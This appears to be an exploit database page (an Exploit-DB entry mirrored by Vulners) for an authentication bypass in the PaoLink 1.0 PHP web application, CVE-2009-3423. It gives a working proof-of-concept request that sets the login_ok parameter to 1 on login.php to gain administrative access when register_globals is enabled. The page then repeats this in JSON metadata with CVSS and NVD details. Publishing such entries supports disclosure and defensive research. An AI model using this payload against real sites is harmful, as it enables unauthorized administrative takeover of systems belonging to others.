Search...

PaoLink 1.0 login_ok Authentication Bypass Vulnerability

2009-07-28T00:00:00

ID EDB-ID:9292
Type exploitdb
Reporter SirGod
Modified 2009-07-28T00:00:00

Description

PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability. CVE-2009-3423. Webapps exploit for php platform

                                        
                                            #############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:9292", "hash": "b3060c06f8f5eb6bc6c945833ba4ffd9", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PaoLink 1.0 login_ok Authentication Bypass Vulnerability", "description": "PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability. CVE-2009-3423. Webapps exploit for php platform", "published": "2009-07-28T00:00:00", "modified": "2009-07-28T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9292/", "reporter": "SirGod", "references": [], "cvelist": ["CVE-2009-3423"], "lastseen": "2016-02-01T10:16:46", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-02-01T10:16:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3423"]}], "modified": "2016-02-01T10:16:46", "rev": 2}, "vulnersScore": 6.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9292/", "sourceData": "#############################################################################\n[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n#############################################################################\n\ndownload : http://zenas.org/paobacheca/download/scarica.html\n\n[+] Authentication Bypass Vulnerability\n\n\n - Notes : register_globals = on\n\n\n - PoC :\n\n http://127.0.0.1/[path]/login.php?login_ok=1\n\n#############################################################################\n\n# milw0rm.com [2009-07-28]\n", "osvdbidlist": ["56756"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3423", "published": "2009-09-25T22:30:00", "title": "CVE-2009-3423", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}